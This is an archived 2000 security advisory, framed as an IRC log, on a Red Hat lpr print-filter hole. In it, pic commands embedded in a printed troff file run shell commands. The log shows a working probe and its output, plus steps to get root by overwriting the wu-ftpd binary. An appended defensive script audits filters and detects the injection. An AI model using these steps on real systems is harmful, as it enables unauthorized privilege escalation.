
redhat.lpr.txt

redhat.lpr.txt
Posted Oct 21, 2000
Authored by Zen-Parse

lpr-0.50-4 and below (Red Hat) contains a vulnerability which allows local users to run commands as other accounts (every user except root), and sometimes as root.

tags | exploit, local, root, vulnerability
SHA-256 | 6ab9815eb4979f4f020da0a0b9a0978875d632bc2a0951630c7aef34b390f59a

Details of an exploit against lpr-0.50-4 (at least)
(also affects other systems that may have the same print filters)

URL : http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt
AFFECTS : lpr-0.50-4 & earlier
SEVERITY : local ROOT possible.
SYNOPSIS : escalation of group permissions (the printing user gains
group lp), leading to an exploit that yields every user
except root. root is sometimes available as well.
(wu-ftpd-2.6.0-14.6x binaries are owned by user
bin, and can be overwritten, allowing root access
if wu-ftpd is installed.)



This is a log of an advisory given in channel
#roothat on irc.pulltheplug.com, October 16 2000.

!!!!!!!!!!!!!!!!!!!!!!!! start of log !!!!!!!!!!!!!!!!!!!!!!!

--> zen-parse (~empathy@p25-max6.dun.ihug.co.nz) has joined #roothat
--- Topic for #roothat is welcome to #roothat -- trivia in #trivia -- root yer printer and j00 get a new group of friends. and stuff.
--- Topic for #roothat set by zen-parse at Sun Oct 15 01:26:35 2000
--- noid gives channel operator status to zen-parse
<bdev> hey zen
<Safety> zen-parse
<Safety> lockdown
<zen-parse> lo all
<bdev> what's this topic all about then zen?
<zen-parse> new hole in lpr package for redhat
<bdev> and...
<bdev> ;]
<bdev> you releasing it ?
--> possem (star@203-173-242-165.nzl.ihugultra.co.nz) has joined #roothat
<zen-parse> [zen@continuity /tmp]$ id
<zen-parse> uid=500(zen) gid=500(zen) groups=500(zen)
<zen-parse> [zen@continuity /tmp]$ cat asdf
<zen-parse> .PS
<zen-parse> sh D/usr/bin/id>/tmp/yougetanyideasyetD
<zen-parse> .PF
<zen-parse> [zen@continuity /tmp]$ lpr asdf
<zen-parse> [zen@continuity /tmp]$ ls /tmp/yougetanyideasyet;cat /tmp/yougetanyideasyet
<zen-parse> uid=500(zen) gid=500(zen) groups=7(lp)
<zen-parse> [zen@continuity /tmp]$
<zen-parse> consider it released
<zen-parse> erm... missing a line...
<bdev> heh
<zen-parse> and should be ls -al /tmp/yougetanyideasyet;cat /tmp/yougetanyideasyet
<zen-parse> -rw-rw-rw- 1 zen zen 39 Oct 16 22:08 /tmp/yougetanyideasyet
<zen-parse> as the output
<bdev> only gid lp ?
<Remmy> ehm
<Remmy> heh
<bdev> but: -r-sr-sr-x 1 root lp 16292 Jan 10 2000 /usr/bin/lpr
*
<-- schematic|ZzZz has quit (Ping timeout)
<zen-parse> thats not where the magic happens though.
<zen-parse> ;]
<zen-parse> needs a running lpd
<zen-parse> and a printer that does troff
<zen-parse> eg: PostScript
<zen-parse> cat /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<Remmy> zen...write a bugtraq advisory
<Remmy> but get really really stoned first.
<Remmy> hehe
<zen-parse> `grog -Tps -msafer $TMP_FILE`
<zen-parse> log this... use this as an advisory. ;]
<zen-parse> that is where the magic happens.
<zen-parse> grog is a perl script that selects the correct command line options for groff. groff can, if asked, run a variety of other programs, such as eqn (for equations), tbl (for tables) and pic (for compiling pictures).
<zen-parse> the -msafer means to disallow the call to any dangerous functions,
such as executing a command or creating or modifying a file.
<zen-parse> However pic is called without that option being passed, even though
it does have a -S switch, which runs it in safer mode.
<possem> zen-parse
<zen-parse> The lpd checks what type of file the file is
<zen-parse> with a program called file
<bdev> hmm
<Remmy> looks perty yummy
<zen-parse> the type of this file is troff or preprocessor...
<-- possem has quit (Quit: )
<zen-parse> so the daemon then hands it to the appropriate filters to print, one of them being /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<zen-parse> which contains the grog command, which causes groff to run pic on the file, and pic executes the file we specify as the user the file was printed by.
<zen-parse> with one exception.
<zen-parse> you have been set to have a list of groups which just contains one group: lp
<Remmy> hmm
<zen-parse> (btw: group lp can edit all the configuration files for lpd. lpd can run the commands as any user (except root).
<zen-parse> however, if u have wuftpd installed, there is a root exploit.
<zen-parse> -rwxr-xr-x 1 bin bin 162608 Oct 14 19:36 /usr/sbin/in.ftpd
<zen-parse> lrwxrwxrwx 1 bin bin 7 Sep 23 02:30 /usr/sbin/wu.ftpd -> in.ftpd
<zen-parse> gain user bin, and copy /bin/sh over in.ftpd
<Remmy> heh
<zen-parse> telnet to port 21, and you have root. so it is a root exploit on systems with wuftpd. and just every other uid on systems with lpd running.
<zen-parse> )
<bdev> heh, nice
<zen-parse> there also appears to be an error file that it attempts to create just after privileges are dropped, but it has insufficient rights at that moment to actually succeed. the directory is owned by root, and only has lp write access because the lpd runs as root.
<zen-parse> um. you dats my advisory ;]
--- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D
<zen-parse> -- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D
<Remmy> ew
<zen-parse> -- zen-parse ;]
<Remmy> hehe
<Remmy> i like yer bugtraq posts better...
<Remmy> ya get all the leeto ascii in there and all...
<zen-parse> ok... now ima save the buffer and submit it to bugtraq ;]
<bdev> kewl
--> ThaReaper (Sir_Vomit@1Cust33.tnt50.chi5.da.uu.net) has joined #roothat
<bdev> that'd be a cool advisory

!!!!!!!!!!!!!!!!!!!!!!!!!! end of log !!!!!!!!!!!!!!!!!!!!!!!
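The two checks a practitioner would want from the log above, written here as an added example (this is not code from the advisory or from Red Hat's rhs-printfilters): a filter-script audit that flags grog/groff being run on the spooled file with only -msafer (which loads the safer macro set but does not put pic into safer mode; pic needs -S, which groff -S passes on), and a detector for spooled troff input that carries a pic "sh" or "copy" command between .PS and .PE/.PF, which is exactly the file that gets printed in the log. The filter scripts and troff inputs are constructed samples; the vulnerable filter line is the one quoted from troff-to-ps.fpi, and the "fixed" line assumes grog passes an option it does not recognise, here -S, through to groff.

```shell
#!/bin/sh
# Added example, not part of the original advisory or of Red Hat's filter
# scripts. Two checks for the weakness described in the log:
#   audit_filter  - flags filter scripts that run grog/groff on the spooled
#                   file without -S (-msafer alone leaves pic unsafe).
#   has_pic_shell - flags troff input carrying a pic "sh" or "copy" command
#                   between .PS and .PE/.PF.
# All filter scripts and troff inputs below are constructed samples.

audit_filter() {
    f=$1
    # non-comment lines that invoke grog or groff as a whole word
    lines=$(grep -E '^[^#]*(^|[^[:alnum:]_])(grog|groff)([^[:alnum:]_]|$)' "$f")
    if [ -z "$lines" ]; then
        echo "$f: no grog/groff invocation"
        return 0
    fi
    # -S as a standalone option word; -Tps and -msafer must not match
    if printf '%s\n' "$lines" | grep -qE '(^|[[:space:]])-S([[:space:]]|$)'; then
        echo "$f: grog/groff run with -S (pic in safer mode)"
        return 0
    fi
    echo "$f: grog/groff run WITHOUT -S; pic will execute sh/copy from the input"
    return 1
}

has_pic_shell() {
    # exit 0 if a pic block in the file contains a sh or copy command
    awk '
        /^\.PS/                                { inpic = 1; next }
        /^\.(PE|PF)/                           { inpic = 0; next }
        inpic && /^[ \t]*(sh|copy)([ \t]|$)/   { found = 1 }
        END { exit (found ? 0 : 1) }
    ' "$1"
}

tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT

# constructed filter mirroring the line quoted from troff-to-ps.fpi in the log
cat > "$tmp/troff-to-ps.fpi" <<'EOF'
#!/bin/sh
TMP_FILE=$1
`grog -Tps -msafer $TMP_FILE`
EOF

# assumed fix: pass -S so groff runs "pic -S" (assumes grog forwards
# options it does not recognise to groff)
cat > "$tmp/troff-to-ps-fixed.fpi" <<'EOF'
#!/bin/sh
TMP_FILE=$1
`grog -S -Tps $TMP_FILE`
EOF

# the probe file from the log (pic "sh" with D as the delimiter)
cat > "$tmp/probe.tr" <<'EOF'
.PS
sh D/usr/bin/id>/tmp/yougetanyideasyetD
.PF
EOF

# ordinary troff input with a picture and no shell escape
cat > "$tmp/plain.tr" <<'EOF'
.PS
box "hello"
.PE
EOF

status=0
for f in "$tmp"/*.fpi; do audit_filter "$f" || status=1; done
for t in "$tmp"/*.tr; do
    if has_pic_shell "$t"; then echo "$t: pic shell escape present"
    else echo "$t: clean"; fi
done
```

Run audit_filter over every script in the print-filter directory and has_pic_shell over the spool directory; the second is the one to run from the lpd side, since that is where the input arrives before file(1) classifies it and the filter chain runs. For the wu-ftpd angle in the log, the matching check is simply a listing of root-started daemons that root does not own, for example find /usr/sbin /usr/bin -type f ! -user root.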

Ob-ASCII

/\/\ mee-errraaAAgghhhraher!
= oo = /
\()/ /
/ __ \
|| ||

in memory of
lucky.

